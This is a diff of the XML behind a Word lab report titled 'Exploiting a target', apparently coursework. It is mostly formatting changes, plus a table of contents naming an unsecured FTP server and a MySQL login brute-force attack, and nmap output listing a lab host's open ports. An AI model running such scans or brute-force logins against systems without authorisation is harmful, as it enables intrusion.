--- a/labs/4/Report.docx
+++ b/labs/4/Report.docx
@@ -18,7 +18,10 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Exploiting a target</w:t>
+        <w:t xml:space="preserve">Exploiting a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>target</w:t>
       </w:r>
     </w:p>
     <w:sdt>
@@ -71,63 +74,110 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc528064831" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Notes</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064831 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
+          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+          <w:bookmarkEnd w:id="0"/>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText>HYPERLINK \l "_Toc528175309"</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>Notes</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:tab/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> PAGEREF _Toc528175309 \h </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:t>2</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -140,7 +190,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc528064832" w:history="1">
+          <w:hyperlink w:anchor="_Toc528175310" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -167,7 +217,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064832 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc528175310 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -209,7 +259,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc528064833" w:history="1">
+          <w:hyperlink w:anchor="_Toc528175311" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -236,7 +286,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064833 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc528175311 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -278,27 +328,13 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc528064834" w:history="1">
+          <w:hyperlink w:anchor="_Toc528175312" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Unsecured FT</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> server</w:t>
+              <w:t>Unsecured FTP server</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -319,7 +355,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064834 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc528175312 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -361,7 +397,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc528064835" w:history="1">
+          <w:hyperlink w:anchor="_Toc528175313" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -388,7 +424,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064835 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc528175313 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -430,13 +466,13 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc528064836" w:history="1">
+          <w:hyperlink w:anchor="_Toc528175314" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Poop exploit</w:t>
+              <w:t>MySQL login brute-force attack</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -457,7 +493,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc528064836 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc528175314 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -477,7 +513,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -509,12 +545,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc528064831"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc528175309"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Notes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:r>
@@ -536,12 +572,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc528064832"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc528175310"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Reconnaissance</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:r>
@@ -550,7 +586,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>I used `nmap` to scan all 65535 ports on the target machine, and then picked some cool-looking ones.</w:t>
+        <w:t>I used `</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>` to scan all 65535 ports on the target machine, and then picked some cool-looking ones.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -579,56 +623,94 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-22 16:33 EDT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Nmap scan report for 172.43.0.154</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">Starting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 7.70 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>( https</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>://nmap.org ) at 2018-10-22 16:33 EDT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scan report for 172.43.0.154</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -639,25 +721,16 @@
         </w:rPr>
         <w:t>Host is up (0.00049s latency).</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -668,25 +741,16 @@
         </w:rPr>
         <w:t>Not shown: 65505 closed ports</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -697,25 +761,16 @@
         </w:rPr>
         <w:t>PORT      STATE SERVICE</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -726,124 +781,100 @@
         </w:rPr>
         <w:t>21/tcp    open  ftp</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>22/tcp    open  ssh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>23/tcp    ope</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="2"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>n  telnet</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>25/tcp    open  smtp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">22/tcp    open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>23/tcp    open  telnet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">25/tcp    open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>smtp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -854,25 +885,16 @@
         </w:rPr>
         <w:t>53/tcp    open  domain</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -883,112 +905,122 @@
         </w:rPr>
         <w:t>80/tcp    open  http</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
